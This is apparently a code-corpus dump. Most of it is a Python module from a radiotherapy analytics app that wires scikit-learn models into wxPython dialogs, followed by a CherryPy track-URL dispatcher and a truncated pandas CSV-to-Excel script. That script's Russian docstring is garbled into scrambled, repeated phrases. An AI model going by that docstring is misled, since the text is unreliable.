number.\\n• If float, \"\n \"then min_samples_leaf is a fraction and ceil(min_samples_leaf * \"\n \"n_samples) are the minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a \"\n \"leaf node. Samples have equal weight when sample_weight is\"\n \" not provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when\"\n \" looking for the best split:\\n• If int, then consider max_features\"\n \" features at each split.\\n• If float, then max_features is a \"\n \"fraction and int(max_features * n_features) features are considered \"\n \"at each split.\\n• If “auto”, then max_features=n_features.\\n• If \"\n \"“sqrt”, then max_features=sqrt(n_features).\\n• If “log2”, then max\"\n \"_features=log2(n_features).\\n• If None, then max_features=n_features.\"\n \"\\nChoosing max_features < n_features leads to a reduction of variance\"\n \" and an increase in bias.\",\n \"alpha\": \"float\\nThe alpha-quantile of the huber loss function and the quantile loss \"\n \"function. Only if loss='huber' or loss='quantile'.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\nwhere N is\"\n \" the total number of samples, N_t is the number of samples at\"\n \" the current node, N_t_L is the number of samples in the left\"\n \" child, and N_t_R is the number of samples in the right child.\"\n \"\\nN, N_t, N_t_R and N_t_L all refer to the weighted sum, if \"\n \"sample_weight is passed.\",\n \"init\": \"If ‘zero’, the initial raw predictions are set to zero. By default a \"\n \"DummyEstimator is used, predicting either the average target value \"\n \"(for loss=’ls’), or a quantile for the other losses.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random number\"\n \" generator; If None, the random number generator is the RandomState \"\n \"instance used by np.random.\",\n \"presort\": \"Whether to presort the data to speed up the finding of best splits in \"\n \"fitting. Auto mode by default will use presorting on dense data and default \"\n \"to normal sorting on sparse data. Setting presort to true on sparse data \"\n \"will raise an error.\",\n \"validation_fraction\": \"float\\nThe proportion of training data to set aside as \"\n \"validation set for early stopping. Must be between 0 and 1. \"\n \"Only used if n_iter_no_change is set to an integer.\",\n \"n_iter_no_change\": \"int or None\\nn_iter_no_change is used to decide if early stopping \"\n \"will be used to terminate training when validation score is not \"\n \"improving. By default it is set to None to disable early stopping.\"\n \" If set to a number, it will set aside validation_fraction size of\"\n \" the training data as validation and terminate training when \"\n \"validation score is not improving in all of the previous \"\n \"n_iter_no_change numbers of iterations.\",\n \"tol\": \"float\\nTolerance for the early stopping. When the loss is not improving by at \"\n \"least tol for n_iter_no_change iterations (if set to a number), the training \"\n \"stops.\",\n}\n\nDT_TOOL_TIPS = {\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are \"\n \"“mse” for the mean squared error, which is equal to variance reduction \"\n \"as feature selection criterion and minimizes the L2 loss using the mean \"\n \"of each terminal node, “friedman_mse”, which uses mean squared error \"\n \"with Friedman’s improvement score for potential splits, and “mae” for \"\n \"the mean absolute error, which minimizes the L1 loss using the median of\"\n \" each terminal node.\",\n \"splitter\": \"The strategy used to choose the split at each node. Supported strategies \"\n \"are “best” to choose the best split and “random” to choose the best \"\n \"random split.\",\n \"max_depth\": \"int, None\\nThe maximum depth of the tree. If None, then nodes are expanded\"\n \" until all leaves are pure or until all leaves contain less than \"\n \"min_samples_split samples.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as the \"\n \"minimum number.\\n• If float, then min_samples_split is a fraction\"\n \" and ceil(min_samples_split * n_samples) are the minimum number \"\n \"of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a leaf\"\n \" node. A split point at any depth will only be considered if it \"\n \"leaves at least min_samples_leaf training samples in each of the \"\n \"left and right branches. This may have the effect of smoothing the\"\n \" model, especially in regression.\\n• If int, then consider \"\n \"min_samples_leaf as the minimum number.\\n• If float, then \"\n \"min_samples_leaf is a fraction and ceil(min_samples_leaf * \"\n \"n_samples) are the minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a leaf\"\n \" node. Samples have equal weight when sample_weight is not\"\n \" provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when\"\n \" looking for the best split:\\n• If int, then consider max_features \"\n \"features at each split.\\n• If float, then max_features is a fraction\"\n \" and int(max_features * n_features) features are considered at each \"\n \"split.\\n• If “auto”, then max_features=n_features.\\n• If “sqrt”, \"\n \"then max_features=sqrt(n_features).\\n• If “log2”, \"\n \"then max_features=log2(n_features).\\n• If None, then \"\n \"max_features=n_features.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\nwhere N is\"\n \" the total number of samples, N_t is the number of samples at\"\n \" the current node, N_t_L is the number of samples in the left\"\n \" child, and N_t_R is the number of samples in the right child.\"\n \"\\nN, N_t, N_t_R and N_t_L all refer to the weighted sum, if \"\n \"sample_weight is passed.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random number\"\n \" generator; If None, the random number generator is the RandomState \"\n \"instance used by np.random.\",\n \"presort\": \"Whether to presort the data to speed up the finding of best splits in \"\n \"fitting. For the default settings of a decision tree on large datasets, \"\n \"setting this to true may slow down the training process. When using either \"\n \"a smaller dataset or a restricted depth, this may speed up the training.\",\n}\n\nSVR_TOOL_TIPS = {\n \"kernel\": \"string\\n\"\n \"Specifies the kernel type to be used in the algorithm. It must be one of ‘linear’, ‘poly’, \"\n \"‘rbf’, ‘sigmoid’, ‘precomputed’ or a callable. If none is given, ‘rbf’ will be used. If \"\n \"a callable is given it is used to precompute the kernel matrix.\",\n \"degree\": \"int\\n\"\n \"Degree of the polynomial kernel function (‘poly’). Ignored by all other kernels.\",\n \"gamma\": \"float\\n\"\n \"Kernel coefficient for ‘rbf’, ‘poly’ and ‘sigmoid’.\\n\\n\"\n \"Current default is ‘auto’ which uses 1 / n_features, if gamma='scale' is passed then it \"\n \"uses 1 / (n_features * X.var()) as value of gamma. The current default of gamma, ‘auto’, \"\n \"will change to ‘scale’ in version 0.22. ‘auto_deprecated’, a deprecated version of ‘auto’ \"\n \"is used as a default indicating that no explicit value of gamma was passed.\",\n \"coef0\": \"float\\n\"\n \"Independent term in kernel function. It is only significant in ‘poly’ and ‘sigmoid’\",\n \"tol\": \"float\\n\" \"Tolerance for stopping criterion.\",\n \"C\": \"float\\n\" \"Penalty parameter C of the error term.\",\n \"epsilon\": \"float\\n\"\n \"Epsilon in the epsilon-SVR model. It specifies the epsilon-tube within which no penalty is\"\n \" associated in the training loss function with points predicted within a distance epsilon\"\n \" from the actual value.\",\n \"shrinking\": \"boolean\\n\" \"Whether to use the shrinking heuristic\",\n \"cache_size\": \"float\\n\" \"Specify the size of the kernel cache (in MB)\",\n \"max_iter\": \"int\\n\"\n \"Hard limit on iterations within solver, or -1 for no limit.\",\n}\n\nDATA_SPLIT_TOOL_TIPS = {\n \"test_size\": \"float, int, or None\\n\"\n \"If float, should be between 0.0 and 1.0 and represent the proportion of the \"\n \"dataset to include in the test split. If int, represents the absolute number of \"\n \"test samples. If None, the value is set to the complement of the train size. If \"\n \"train_size is also None, it will be set to 0.25.\",\n \"train_size\": \"float, int, or None\\n\"\n \"If float, should be between 0.0 and 1.0 and represent the proportion of the \"\n \"dataset to include in the train split. If int, represents the absolute number \"\n \"of train samples. If None, the value is automatically set to the complement of \"\n \"the test size.\",\n \"random_state\": \"int or None\\n\"\n \"If int, random_state is the seed used by the random number generator; If None,\"\n \" the random number generator is the RandomState instance used by np.random.\",\n \"shuffle\": \"boolean\\n\"\n \"Whether or not to shuffle the data before splitting. If shuffle=False then stratify\"\n \" must be None.\",\n}\n\n\nMLP_TOOL_TIPS = {\n \"hidden_layer_sizes\": \"tuple, length = n_layers - 2\\n\",\n \"activation\": \"string\\n\"\n \"Activation function for the hidden layer.\\n\"\n \"identity: no-op activation, useful to implement linear bottleneck, returns f(x) = x.\\n\"\n \"logistic: the logistic sigmoid function, returns f(x) = 1 / (1 + exp(-x)).\\n\"\n \"tanh: the hyperbolic tan function, returns f(x) = tanh(x).\\n\"\n \"relu: the rectified linear unit function, returns f(x) = max(0, x)\",\n \"solver\": \"string\\nThe solver for weight optimization.\"\n \"lbfgs is an optimizer in the family of quasi-Newton methods.\\n\"\n \"sgd refers to stochastic gradient descent.\\n\"\n \"adam refers to a stochastic gradient-based optimizer proposed by Kingma, Diederik, \"\n \"and Jimmy Ba\\n\\n\"\n \"Note: The default solver ‘adam’ works pretty well on relatively large datasets \"\n \"(with thousands of training samples or more) in terms of both training time and validation \"\n \"score. For small datasets, however, ‘lbfgs’ can converge faster and perform better.\",\n \"alpha\": \"float\\n\" \"L2 penalty (regularization term) parameter.\",\n \"batch_size\": \"int or string\\n\"\n \"Size of minibatches for stochastic optimizers. If the solver is ‘lbfgs’, the \"\n \"classifier will not use minibatch. When set to “auto”, batch_size=min(200, n_samples)\",\n \"learning_rate\": \"string\\n\"\n \"Learning rate schedule for weight updates.\\n\"\n \"constant is a constant learning rate given by ‘learning_rate_init’.\\n\"\n \"invscaling gradually decreases the learning rate at each time step ‘t’ \"\n \"using an inverse scaling exponent of ‘power_t’. effective_\"\n \"learning_rate = learning_rate_init / pow(t, power_t)\\n\"\n \"adaptive keeps the learning rate constant to ‘learning_rate_init’ as long as \"\n \"training loss keeps decreasing. Each time two consecutive epochs fail to decrease \"\n \"training loss by at least tol, or fail to increase validation score by at least \"\n \"tol if ‘early_stopping’ is on, the current learning rate is divided by 5.\",\n \"learning_rate_init\": \"double\\n\"\n \"The initial learning rate used. It controls the step-size in updating the \"\n \"weights. Only used when solver=’sgd’ or ‘adam’.\",\n \"power_t\": \"double\\n\"\n \"The exponent for inverse scaling learning rate. It is used in updating effective \"\n \"learning rate when the learning_rate is set to ‘invscaling’. Only used when solver=’sgd’.\",\n \"max_iter\": \"int\\n\"\n \"Maximum number of iterations. The solver iterates until convergence (determined by \"\n \"‘tol’) or this number of iterations. For stochastic solvers (‘sgd’, ‘adam’), note that \"\n \"this determines the number of epochs (how many times each data point will be used), not \"\n \"the number of gradient steps.\",\n \"shuffle\": \"bool\\n\"\n \"Whether to shuffle samples in each iteration. Only used when solver=’sgd’ or ‘adam’.\",\n \"random_state\": \"int or None\\n\"\n \"If int, random_state is the seed used by the random number generator; \"\n \"If None, the random number generator is the RandomState instance used by np.random.\",\n \"tol\": \"float\\n\"\n \"Tolerance for the optimization. When the loss or score is not improving by at least tol for \"\n \"n_iter_no_change consecutive iterations, unless learning_rate is set to ‘adaptive’, \"\n \"convergence is considered to be reached and training stops.\",\n \"warm_start\": \"bool\\n\"\n \"When set to True, reuse the solution of the previous call to fit as initialization, \"\n \"otherwise, just erase the previous solution.\",\n \"momentum\": \"float\\n\"\n \"Momentum for gradient descent update. Should be between 0 and 1. \"\n \"Only used when solver=’sgd’.\",\n \"nesterovs_momentum\": \"bool\\n\"\n \"Whether to use Nesterov’s momentum. Only used when solver=’sgd’ \"\n \"and momentum > 0.\",\n \"early_stopping\": \"bool\\n\"\n \"Whether to use early stopping to terminate training when validation score is not \"\n \"improving. If set to true, it will automatically set aside 10% of training data \"\n \"as validation and terminate training when validation score is not improving by \"\n \"at least tol for n_iter_no_change consecutive epochs. The split is stratified, \"\n \"except in a multilabel setting. Only effective when solver=’sgd’ or ‘adam’\",\n \"validation_fraction\": \"float\\n\"\n \"The proportion of training data to set aside as validation set for early \"\n \"stopping. Must be between 0 and 1. Only used if early_stopping is True\",\n \"beta_1\": \"float\\n\"\n \"Exponential decay rate for estimates of first moment vector in adam, should be in [0, 1). \"\n \"Only used when solver=’adam’\",\n \"beta_2\": \"float\\n\"\n \"Exponential decay rate for estimates of second moment vector in adam, should be in [0, 1).\"\n \" Only used when solver=’adam’\",\n \"epsilon\": \"float\\n\"\n \"Value for numerical stability in adam. Only used when solver=’adam’\",\n \"n_iter_no_change\": \"int\\n\"\n \"Maximum number of epochs to not meet tol improvement. Only effective when \"\n \"solver=’sgd’ or ‘adam’\",\n}\n\n\nALGORITHMS = {\n \"Random Forest\": {\n \"regressor\": RandomForestRegressor,\n \"classifier\": RandomForestClassifier,\n \"tool_tips\": RF_TOOL_TIPS,\n \"frame\": RandomForestFrame,\n },\n \"Support Vector Machine\": {\n \"regressor\": SVR,\n \"classifier\": SVC,\n \"tool_tips\": SVR_TOOL_TIPS,\n \"frame\": SupportVectorRegressionFrame,\n },\n \"Gradient Boosting\": {\n \"regressor\": GradientBoostingRegressor,\n \"classifier\": GradientBoostingClassifier,\n \"tool_tips\": GB_TOOL_TIPS,\n \"frame\": GradientBoostingFrame,\n },\n \"Decision Tree\": {\n \"regressor\": DecisionTreeRegressor,\n \"classifier\": DecisionTreeClassifier,\n \"tool_tips\": DT_TOOL_TIPS,\n \"frame\": DecisionTreeFrame,\n },\n \"Multilayer Perceptron\": {\n \"regressor\": MLPRegressor,\n \"classifier\": MLPClassifier,\n \"tool_tips\": MLP_TOOL_TIPS,\n \"frame\": MLPFrame,\n },\n}\n\n\nclass MachineLearningPlotData:\n def __init__(self, X, y, model, do_training=True, **kwargs):\n self.model = model\n self.split_args = kwargs\n\n indices = list(range(len(y)))\n\n # split the data for training and testing\n split_data = train_test_split(X, indices, **kwargs)\n self.X = {\"data\": X, \"train\": split_data[0], \"test\": split_data[1]}\n self.indices = {\n \"data\": indices,\n \"train\": split_data[2],\n \"test\": split_data[3],\n }\n self.y = {\n \"data\": y,\n \"train\": [y[i] for i in split_data[2]],\n \"test\": [y[i] for i in split_data[3]],\n }\n self.x = {\n key: [i + 1 for i in range(len(data))]\n for key, data in self.y.items()\n }\n\n # Train model, then calculate predictions, residuals, and mse\n if do_training:\n self.model.fit(self.X[\"train\"], self.y[\"train\"])\n self.predictions = {\n key: self.get_prediction(key) for key in self.y.keys()\n }\n self.residuals = {key: self.get_residual(key) for key in self.y.keys()}\n self.mse = {key: self.get_mse(key) for key in self.y.keys()}\n self.accuracy = {key: self.get_accuracy(key) for key in self.y.keys()}\n\n def get_prediction(self, key):\n return self.model.predict(self.X[key])\n\n def get_mse(self, key):\n return np.mean(\n np.square(np.subtract(self.predictions[key], self.y[key]))\n )\n\n def get_residual(self, key):\n return np.subtract(self.y[key], self.model.predict(self.X[key]))\n\n def get_accuracy(self, key):\n \"\"\"Only applicable for classifiers\"\"\"\n return np.count_nonzero(\n np.subtract(self.predictions[key], self.y[key]) == 0\n ) / len(self.y[key])\n\n @property\n def feature_importances(self):\n if hasattr(self.model, \"feature_importances_\"):\n return self.model.feature_importances_\n return None\n\n\nclass FeatureImportanceFrame(wx.Frame):\n def __init__(\n self,\n options,\n x_variables,\n feature_importances,\n frame_title,\n plot_title,\n ):\n wx.Frame.__init__(self, None)\n\n self.title = frame_title\n\n self.plot = PlotFeatureImportance(\n self, options, x_variables, feature_importances, plot_title\n )\n\n self.set_properties()\n self.do_layout()\n\n self.Bind(wx.EVT_SIZE, self.on_resize)\n\n def set_properties(self):\n self.SetTitle(self.title)\n self.SetMinSize(get_window_size(0.35, 0.8))\n\n def do_layout(self):\n sizer_wrapper = wx.BoxSizer(wx.HORIZONTAL)\n sizer_wrapper.Add(self.plot.layout, 1, wx.EXPAND, 0)\n\n set_msw_background_color(\n self\n ) # If windows, change the background color\n set_frame_icon(self)\n\n self.SetSizer(sizer_wrapper)\n self.Layout()\n self.Fit()\n self.Center()\n\n def redraw_plot(self):\n self.plot.redraw_plot()\n\n def on_resize(self, *evt):\n try:\n self.Refresh()\n self.Layout()\n wx.CallAfter(self.redraw_plot)\n except RuntimeError:\n pass\n\n\nclass MachineLearningModelViewer:\n def __init__(self, parent, group_data, group, options, mvr=None):\n self.parent = parent\n self.group_data = group_data\n self.group = group\n self.stats_data = group_data[group][\"stats_data\"]\n self.options = options\n\n self.file_path = self.file_select_dlg()\n\n if self.file_path:\n\n self.__load_ml_file()\n try:\n if self.is_valid:\n self.__set_X_and_y_data()\n\n self.mvr = mvr\n self.multi_var_pred = (\n None if mvr is None else self.mvr.predictions\n )\n\n data_keys = [\n \"X\",\n \"y\",\n \"x_variables\",\n \"y_variable\",\n \"multi_var_pred\",\n \"options\",\n \"mrn\",\n \"study_date\",\n \"uid\",\n ]\n data = {key: getattr(self, key) for key in data_keys}\n frame = ALGORITHMS[self.title][\"frame\"]\n self.ml_frame = frame(\n parent, data, include_test_data=False\n )\n self.__load_model()\n\n set_msw_background_color(self.ml_frame)\n set_frame_icon(self.ml_frame)\n\n self.ml_frame.run()\n else:\n if self.stats_data is None:\n msg = \"No data has been queried for Group %s.\" % group\n elif not self.is_ml:\n msg = \"Selected file is not a valid machine learning model save file.\"\n elif not self.stats_data_has_y:\n msg = (\n \"The model's dependent variable is not found in your queried data:\\n%s\"\n % self.y_variable\n )\n elif self.missing_x_variables:\n msg = (\n \"Your queried data is missing the following independent variables:\\n%s\"\n % \", \".join(self.missing_x_variables)\n )\n else:\n msg = \"Unknown error.\"\n\n wx.MessageBox(\n msg,\n \"Model Loading Error\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING,\n )\n except Exception as e:\n msg = str(e)\n wx.MessageBox(\n msg,\n \"Model Loading Error\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING,\n )\n\n def file_select_dlg(self):\n with wx.FileDialog(\n self.parent,\n \"Load a machine learning model\",\n wildcard=\"*.ml\",\n style=wx.FD_FILE_MUST_EXIST | wx.FD_OPEN,\n ) as dlg:\n dlg.SetDirectory(MODELS_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n return dlg.GetPath()\n\n def __load_ml_file(self):\n self.loaded_data = load_object_from_file(self.file_path)\n\n self.y_variable = self.loaded_data[\"y_variable\"]\n self.tool_tips = self.loaded_data[\"tool_tips\"]\n self.x_variables = self.loaded_data[\"x_variables\"]\n self.title = self.loaded_data[\"title\"]\n self.input_parameters = self.loaded_data[\"input_parameters\"]\n self.data_split = self.loaded_data[\"data_split\"]\n self.version = self.loaded_data[\"version\"]\n\n # As of v0.8.9, model -> sklearn_predictor, regression -> model\n if \"sklearn_predictor\" in self.loaded_data.keys():\n self.model = self.loaded_data[\"model\"]\n self.sklearn_predictor = self.loaded_data[\"sklearn_predictor\"]\n else:\n self.model = self.loaded_data[\"regression\"]\n self.sklearn_predictor = self.loaded_data[\"model\"]\n\n def __load_model(self):\n self.ml_frame.model = self.model\n self.ml_frame.set_input_parameters(self.input_parameters)\n self.ml_frame.set_data_split_parameters(self.data_split)\n self.__disable_input()\n\n def __disable_input(self):\n for variable, input_obj in self.ml_frame.input.items():\n input_obj.Disable()\n for variable, input_obj in self.ml_frame.data_split_input.items():\n input_obj.Disable()\n self.ml_frame.button_calculate.Disable()\n self.ml_frame.button_save_model.Disable()\n\n def __set_X_and_y_data(self):\n (\n self.X,\n self.y,\n self.mrn,\n self.uid,\n self.study_date,\n ) = self.stats_data.get_X_and_y(\n self.y_variable, self.x_variables, include_patient_info=True\n )\n\n @property\n def is_ml(self):\n return \"title\" in list(self.loaded_data) and self.loaded_data[\n \"title\"\n ] in list(ALGORITHMS)\n\n @property\n def is_valid(self):\n return (\n self.stats_data is not None\n and self.is_ml\n and not self.missing_x_variables\n and self.stats_data_has_y\n )\n\n @property\n def missing_x_variables(self):\n return [\n x for x in self.x_variables if x not in list(self.stats_data.data)\n ]\n\n @property\n def stats_data_has_y(self):\n return self.y_variable in list(self.stats_data.data)\n\n def apply_plot_options(self):\n self.ml_frame.plot.apply_options()\n self.ml_frame.redraw_plot()\n\n\nclass MachineLearningSetupDlg(wx.Dialog):\n def __init__(self, stats_data, options):\n wx.Dialog.__init__(self, None, title=\"Machine Learning\")\n\n self.stats_data = stats_data\n self.options = options\n\n self.combo_box_type = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"Regression\", \"Classification\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_alg = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=sorted(list(ALGORITHMS.keys())),\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_nan = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"Ignore Study\", \"Ignore Feature\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_y = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=stats_data.variables,\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n\n self.list_ctrl_features = wx.ListCtrl(\n self, wx.ID_ANY, style=wx.LC_NO_HEADER | wx.LC_REPORT\n )\n\n bmp = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, size=(16, 16))\n self.button_info = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmp)\n\n self.button_select_all = wx.Button(self, wx.ID_ANY, \"Select All\")\n self.button_deselect_all = wx.Button(self, wx.ID_ANY, \"Deselect All\")\n self.button_ok = wx.Button(self, wx.ID_OK, \"OK\")\n\n self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"Cancel\")\n\n self.__set_properties()\n\n self.__do_bind()\n self.__do_layout()\n\n def __set_properties(self):\n self.list_ctrl_features.AppendColumn(\n \"Features\", format=wx.LIST_FORMAT_LEFT, width=400\n )\n\n for choice in self.stats_data.variables:\n self.list_ctrl_features.InsertItem(50000, choice)\n\n self.combo_box_type.SetValue(\"Regression\")\n self.combo_box_alg.SetValue(sorted(list(ALGORITHMS.keys()))[0])\n self.combo_box_nan.SetValue(\"Ignore Study\")\n self.combo_box_y.SetValue(self.stats_data.variables[0])\n\n def __do_bind(self):\n self.Bind(\n wx.EVT_BUTTON, self.select_all, id=self.button_select_all.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.deselect_all,\n id=self.button_deselect_all.GetId(),\n )\n self.Bind(wx.EVT_BUTTON, self.on_info, id=self.button_info.GetId())\n\n def __do_layout(self):\n\n sizer_wrapper = wx.BoxSizer(wx.VERTICAL)\n sizer_main = wx.BoxSizer(wx.VERTICAL)\n sizer_input_wrapper = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"\"), wx.HORIZONTAL\n )\n sizer_input = wx.BoxSizer(wx.VERTICAL)\n sizer_type = wx.BoxSizer(wx.VERTICAL)\n sizer_type_sub_sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer_alg = wx.BoxSizer(wx.VERTICAL)\n sizer_nan_policy = wx.BoxSizer(wx.VERTICAL)\n sizer_y_var = wx.BoxSizer(wx.VERTICAL)\n sizer_features = wx.BoxSizer(wx.VERTICAL)\n sizer_select_all = wx.BoxSizer(wx.HORIZONTAL)\n sizer_ok_cancel = wx.BoxSizer(wx.HORIZONTAL)\n\n label_type = wx.StaticText(self, wx.ID_ANY, \"ML Type:\")\n label_alg = wx.StaticText(self, wx.ID_ANY, \"Algorithm:\")\n label_nan_policy = wx.StaticText(self, wx.ID_ANY, \"NaN Policy:\")\n label_y = wx.StaticText(self, wx.ID_ANY, \"Dependent Variable:\")\n label_features = wx.StaticText(self, wx.ID_ANY, \"Features:\")\n\n sizer_type.Add(label_type, 0, 0, 0)\n sizer_type_sub_sizer.Add(self.combo_box_type, 1, wx.EXPAND, 0)\n sizer_type_sub_sizer.Add(self.button_info, 0, wx.EXPAND | wx.LEFT, 5)\n sizer_type.Add(sizer_type_sub_sizer, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_type, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_alg.Add(label_alg, 0, 0, 0)\n sizer_alg.Add(self.combo_box_alg, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_alg, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_nan_policy.Add(label_nan_policy, 0, 0, 0)\n sizer_nan_policy.Add(self.combo_box_nan, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_nan_policy, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_y_var.Add(label_y, 0, 0, 0)\n sizer_y_var.Add(self.combo_box_y, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_y_var, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_features.Add(label_features, 0, wx.BOTTOM | wx.EXPAND, 5)\n sizer_features.Add(self.list_ctrl_features, 1, wx.EXPAND, 0)\n sizer_select_all.Add(self.button_select_all, 0, wx.ALL, 5)\n sizer_select_all.Add(self.button_deselect_all, 0, wx.ALL, 5)\n sizer_features.Add(sizer_select_all, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)\n\n sizer_input.Add(\n sizer_features, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5\n )\n\n sizer_input_wrapper.Add(sizer_input, 1, wx.EXPAND, 0)\n sizer_main.Add(sizer_input_wrapper, 1, wx.EXPAND | wx.RIGHT, 5)\n\n sizer_ok_cancel.Add(self.button_ok, 0, wx.ALL, 5)\n sizer_ok_cancel.Add(self.button_cancel, 0, wx.ALL, 5)\n sizer_main.Add(sizer_ok_cancel, 0, wx.ALIGN_RIGHT | wx.RIGHT, 5)\n\n sizer_wrapper.Add(sizer_main, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(sizer_wrapper)\n sizer_wrapper.Fit(self)\n\n self.Layout()\n self.Center()\n\n def select_all(self, evt):\n self.apply_global_selection()\n\n def deselect_all(self, evt):\n self.apply_global_selection(on=0)\n\n def apply_global_selection(self, on=1):\n for i in range(len(self.stats_data.variables)):\n self.list_ctrl_features.Select(i, on=on)\n\n @property\n def selected_indices(self):\n if len(get_selected_listctrl_items(self.list_ctrl_features)) == 0:\n self.apply_global_selection()\n return get_selected_listctrl_items(self.list_ctrl_features)\n\n @property\n def selected_features(self):\n features = [\n self.list_ctrl_features.GetItem(i, 0).GetText()\n for i in self.selected_indices\n ]\n ignore_me = [self.y]\n if self.ignore_feature_if_nan:\n ignore_me.extend(self.stats_data.vars_with_nan_values)\n return sorted(list(set(features) - set(ignore_me)))\n\n @property\n def alg_type(self):\n return [\"classifier\", \"regressor\"][\n self.combo_box_type.GetValue() == \"Regression\"\n ]\n\n @property\n def ml_alg(self):\n return self.combo_box_alg.GetValue()\n\n @property\n def y(self):\n return self.combo_box_y.GetValue()\n\n @property\n def ignore_feature_if_nan(self):\n return self.combo_box_nan.GetValue() == \"Ignore Feature\"\n\n @property\n def ml_input_data(self):\n X, y, mrn, uid, dates = self.stats_data.get_X_and_y(\n self.y, self.selected_features, include_patient_info=True\n )\n\n return {\n \"X\": X,\n \"y\": y,\n \"x_variables\": self.selected_features,\n \"y_variable\": self.y,\n \"options\": self.options,\n \"mrn\": mrn,\n \"study_date\": dates,\n \"uid\": uid,\n }\n\n def on_info(self, *evt):\n msg = (\n \"You can add new features by going to Data -> Show Stats Data in the menu bar. \"\n \"Right-click a column header to add a new column. You can copy/paste data to/from MS Excel.\\n\\n\"\n \"This is how you can add categorical data for a classifier (e.g., toxicity grade), however, \"\n \"data currently MUST be numeric. You'll need to use integers to represent your categories.\"\n )\n wx.MessageBox(\n msg,\n \"Data Editing Tip\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_INFORMATION,\n )\n","repo_name":"cutright/DVH-Analytics","sub_path":"dvha/models/machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":70701,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"78"} +{"seq_id":"74725542333","text":"import cherrypy\nimport re\n\n\nclass Dispatcher(cherrypy.dispatch.Dispatcher):\n routes = {\n '/track': (re.compile(r\"/track/(.*?)\\.mp3\", re.IGNORECASE), 'track')\n }\n\n def __init__(self, server):\n super(Dispatcher, self).__init__()\n self.server = server\n\n def __call__(self, path_info):\n matching_routes = [name for name in self.routes.keys() if path_info.startswith(name)]\n\n if not matching_routes:\n return super(Dispatcher, self).__call__(path_info)\n\n r_regex, r_func = self.routes[matching_routes[0]]\n\n match = r_regex.match(path_info)\n\n if not match:\n return super(Dispatcher, self).__call__(path_info)\n\n func = getattr(self.server, r_func)\n\n request = cherrypy.serving.request\n\n request.config = cherrypy.config.copy()\n request.config.update(getattr(func, '_cp_config', {}))\n\n request.handler = cherrypy.dispatch.LateParamPageHandler(func, *match.groups())\n","repo_name":"fuzeman/Spotify2.bundle","sub_path":"Contents/Libraries/Shared/plugin/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"42610360559","text":"\"\"\"\nПрочитать с файломох преобразований выводить на экран).ранённый csv-файл, первой файл и с файломох преобразований выводить на экран).ранить данные\nв excel файл кроме воз example.txtрас файломта – имя(str), возраст(int). с файломтолбец и добавив новый столбец “телефон”. с файлом этими данными - ,\nне нужен.\n\"\"\"\nimport pandas as pd\nimport openpyxl\n\ndf = pd.read_csv('task_4.csv')\ndroped_df = df.drop(columns=['Age'], axis=1)\ndf_adding_columns = droped_df.set_axis((['Person {}'.format(i) for i in range(1, len(droped_df) + 